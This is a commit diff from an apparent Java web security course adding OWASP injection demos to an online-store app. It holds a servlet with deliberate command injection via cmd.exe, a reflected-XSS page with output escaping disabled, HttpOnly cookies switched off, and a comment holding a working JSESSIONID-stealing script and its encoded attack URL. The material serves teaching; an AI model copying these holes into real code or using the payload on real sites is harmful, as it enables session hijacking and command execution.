Skip to content

Commit f41b6da

Browse files
AndriiPiatakhaAndriiPiatakha
committed
OWASP Injection Demo
1 parent 74cd9a8 commit f41b6da

File tree

4 files changed

+191
-1
lines changed

4 files changed

+191
-1
lines changed

Diff for: online-store.web/src/main/java/com/itbulls/learnit/onlinestore/web/owasp/i/problem/CommandInjectionServletDemo.java

+38
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
package com.itbulls.learnit.onlinestore.web.owasp.i.problem;
2+
3+
import jakarta.servlet.http.HttpServlet;
4+
5+
import java.io.BufferedReader;
6+
import java.io.IOException;
7+
import java.io.InputStreamReader;
8+
import java.nio.charset.StandardCharsets;
9+
import java.util.Scanner;
10+
11+
import jakarta.servlet.ServletException;
12+
import jakarta.servlet.annotation.WebServlet;
13+
import jakarta.servlet.http.HttpServletRequest;
14+
import jakarta.servlet.http.HttpServletResponse;
15+
16+
@WebServlet("/comm-inj")
17+
public class CommandInjectionServletDemo extends HttpServlet {
18+
19+
protected void doGet(HttpServletRequest request, HttpServletResponse response)
20+
throws ServletException, IOException {
21+
try {
22+
String comm = "cmd.exe /c dir " + ".\\products\\"
23+
+ request.getParameter("productCategory");
24+
Process process = Runtime.getRuntime().exec(comm);
25+
BufferedReader stdInput = new BufferedReader(
26+
new InputStreamReader(process.getInputStream(), StandardCharsets.UTF_8));
27+
28+
String s = null;
29+
while ((s = stdInput.readLine()) != null) {
30+
response.getWriter().println(s);
31+
}
32+
} catch (IOException e) {
33+
System.out.println("Error executing command");
34+
}
35+
36+
}
37+
38+
}

Diff for: online-store.web/src/main/java/com/itbulls/learnit/onlinestore/web/owasp/i/problem/ReflectedXssServletDemo.java

+75
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,75 @@
1+
package com.itbulls.learnit.onlinestore.web.owasp.i.problem;
2+
3+
import jakarta.servlet.http.HttpServlet;
4+
import java.io.IOException;
5+
6+
import com.itbulls.learnit.onlinestore.core.facades.ProductFacade;
7+
import com.itbulls.learnit.onlinestore.core.facades.impl.DefaultProductFacade;
8+
import com.itbulls.learnit.onlinestore.persistence.enteties.Product;
9+
import com.itbulls.learnit.onlinestore.web.Configurations;
10+
11+
import jakarta.servlet.ServletException;
12+
import jakarta.servlet.annotation.WebServlet;
13+
import jakarta.servlet.http.HttpServletRequest;
14+
import jakarta.servlet.http.HttpServletResponse;
15+
16+
/*
17+
18+
Script for Injection
19+
20+
<script>
21+
function getJSessionId(){
22+
var jsId = document.cookie.match(/JSESSIONID=[^;]+/);
23+
if(jsId != null) {
24+
if (jsId instanceof Array)
25+
jsId = jsId[0].substring(11);
26+
else
27+
jsId = jsId.substring(11);
28+
}
29+
return jsId;
30+
}
31+
var url = "http://localhost:8080/online-store.web/refl-xss-demo";
32+
33+
var xhr = new XMLHttpRequest();
34+
xhr.open("POST", url);
35+
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
36+
var params = "sessionId=" + getJSessionId();
37+
38+
xhr.onreadystatechange = function () {
39+
if (xhr.readyState === 4) {
40+
console.log(xhr.status);
41+
console.log(xhr.responseText);
42+
}};
43+
44+
xhr.send(params);
45+
</script>
46+
47+
URL with the encoded script
48+
http://localhost:8080/online-store.web/refl-xss-demo?id=1&discountCoupon=%3Cscript%3E%0Afunction%20getJSessionId%28%29%7B%0A%20%20%20%20var%20jsId%20%3D%20document.cookie.match%28%2FJSESSIONID%3D%5B%5E%3B%5D%2B%2F%29%3B%0A%20%20%20%20if%28jsId%20%21%3D%20null%29%20%7B%0A%20%20%20%20%20%20%20%20if%20%28jsId%20instanceof%20Array%29%0A%20%20%20%20%20%20%20%20%20%20%20%20jsId%20%3D%20jsId%5B0%5D.substring%2811%29%3B%0A%20%20%20%20%20%20%20%20else%0A%20%20%20%20%20%20%20%20%20%20%20%20jsId%20%3D%20jsId.substring%2811%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20return%20jsId%3B%0A%7D%0Avar%20url%20%3D%20%22http%3A%2F%2Flocalhost%3A8080%2Fonline-store.web%2Frefl-xss-demo%22%3B%0A%0Avar%20xhr%20%3D%20new%20XMLHttpRequest%28%29%3B%0Axhr.open%28%22POST%22%2C%20url%29%3B%0Axhr.setRequestHeader%28%27Content-type%27%2C%20%27application%2Fx-www-form-urlencoded%27%29%3B%0Avar%20params%20%3D%20%22sessionId%3D%22%20%2B%20getJSessionId%28%29%3B%0A%0Axhr.onreadystatechange%20%3D%20function%20%28%29%20%7B%0A%20%20%20if%20%28xhr.readyState%20%3D%3D%3D%204%29%20%7B%0A%20%20%20%20%20%20console.log%28xhr.status%29%3B%0A%20%20%20%20%20%20console.log%28xhr.responseText%29%3B%0A%20%20%20%7D%7D%3B%0A%0Axhr.send%28params%29%3B%0A%3C%2Fscript%3E
49+
50+
*/
51+
52+
53+
@WebServlet("/refl-xss-demo")
54+
public class ReflectedXssServletDemo extends HttpServlet {
55+
56+
private ProductFacade productFacade = DefaultProductFacade.getInstance();
57+
58+
protected void doGet(HttpServletRequest request, HttpServletResponse response)
59+
throws ServletException, IOException {
60+
String discountCoupon = request.getParameter("discountCoupon");
61+
Product p = productFacade.getProductById(Integer.valueOf(request.getParameter("id")));
62+
63+
request.setAttribute("product", p);
64+
request.setAttribute("discountCoupon", discountCoupon);
65+
66+
request.getRequestDispatcher(Configurations.VIEWS_PATH_RESOLVER + "pdp-xss-demo.jsp").forward(request, response);
67+
}
68+
69+
protected void doPost(HttpServletRequest request, HttpServletResponse response)
70+
throws ServletException, IOException {
71+
System.out.println("***** Cookies received *****");
72+
System.out.println(request.getParameter("sessionId"));
73+
}
74+
75+
}

Diff for: online-store.web/src/main/webapp/META-INF/context.xml

+1-1
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
11
<?xml version="1.0" encoding="UTF-8"?>
2-
<context>
2+
<context useHttpOnly="false">
33

44

55
<Resource name="jdbc/connpool"

Diff for: online-store.web/src/main/webapp/WEB-INF/views/pdp-xss-demo.jsp

+77
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,77 @@
1+
<%@ page language="java" contentType="text/html; charset=UTF-8"
2+
pageEncoding="UTF-8"%>
3+
<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>
4+
<%@ taglib prefix="shop" tagdir="/WEB-INF/tags/shop"%>
5+
<!DOCTYPE html>
6+
<html lang="en">
7+
<head>
8+
<meta charset="UTF-8">
9+
<title>Product Details Page</title>
10+
11+
<shop:css-imports-main/>
12+
</head>
13+
<body>
14+
15+
<shop:header/>
16+
17+
<div class="product-page-main">
18+
<div class="container">
19+
<div class="row">
20+
<div class="col-md-12">
21+
<div class="prod-page-title">
22+
<h2>${product.productName}</h2>
23+
</div>
24+
</div>
25+
</div>
26+
<div class="row">
27+
28+
<div class="col-md-7 col-sm-8">
29+
<div class="md-prod-page">
30+
<div class="md-prod-page-in">
31+
<div class="page-preview">
32+
<div class="preview">
33+
<div class="preview-pic tab-content">
34+
<div class="tab-pane active" id="pic-1"><img src="images/product/${product.imgName}" alt="#" /></div>
35+
</div>
36+
</div>
37+
</div>
38+
39+
</div>
40+
<div class="description-box">
41+
<div class="dex-a">
42+
<h4>Description</h4>
43+
<p>${product.description}</p>
44+
</div>
45+
46+
</div>
47+
</div>
48+
49+
</div>
50+
51+
<div class="col-md-5 col-sm-16">
52+
<div class="price-box-right">
53+
<h4>Price</h4>
54+
<h3>$${product.price}</h3>
55+
<h3>${discountCoupon}</h3>
56+
<!-- To avoid XSS - never forget to escape output like in the line below -->
57+
<!-- <h3><c:out value="${discountCoupon}" escapeXml="true"/> </h3> -->
58+
<c:if test="${not empty loggedInUser}">
59+
<a href="checkout?id=${product.id}">Buy</a>
60+
</c:if>
61+
<c:if test="${empty loggedInUser}">
62+
<a href="signin">Buy</a>
63+
</c:if>
64+
<h5>${orderStatus}</h5>
65+
<c:remove var="orderStatus"/>
66+
67+
</div>
68+
</div>
69+
70+
</div>
71+
</div>
72+
</div>
73+
74+
<shop:footer/>
75+
<shop:js-imports-main/>
76+
</body>
77+
</html>

0 commit comments

Comments
 (0)